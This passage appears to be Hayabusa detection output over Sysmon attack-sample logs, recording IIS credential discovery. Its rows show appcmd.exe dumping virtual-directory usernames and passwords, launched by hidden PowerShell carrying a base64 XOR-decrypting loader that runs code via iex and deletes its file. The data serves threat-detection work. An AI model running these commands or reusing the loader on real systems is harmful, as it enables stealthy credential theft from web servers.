JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 3304 | PGUID: 365ABB72-3D6E-5CEB-0000-00102FAAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:18.973 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""ERROR ( message:Configuration error "" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2276 | PGUID: 365ABB72-3D6E-5CEB-0000-0010EFADFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.063 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 1508 | PGUID: 365ABB72-3D6F-5CEB-0000-0010A6B1FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.143 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2796 | PGUID: 365ABB72-3D6F-5CEB-0000-001066B5FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.233 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 1036 | PGUID: 365ABB72-3D6F-5CEB-0000-001026B9FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.323 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Filename: redirection.config"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 168 | PGUID: 365ABB72-3D6F-5CEB-0000-00108FBFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.403 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 2484 | PGUID: 365ABB72-3D6F-5CEB-0000-00104FC3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.473 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== | LID: 0x82423 | PID: 2168 | PGUID: 365ABB72-3D6F-5CEB-0000-00100FC7FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.563 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3892 | PGUID: 365ABB72-3D6F-5CEB-0000-0010CFCAFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.784 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir ""Line Number: 0"" /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3844 | PGUID: 365ABB72-3D6F-5CEB-0000-0010F2CFFF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.894 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:userName | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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 | LID: 0x82423 | PID: 3848 | PGUID: 365ABB72-3D6F-5CEB-0000-0010B2D3FF00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx +2019-05-27 10:29:19.964 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\inetsrv\appcmd.exe"" list vdir /text:password | Process: C:\Windows\System32\inetsrv\appcmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlA
CkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAc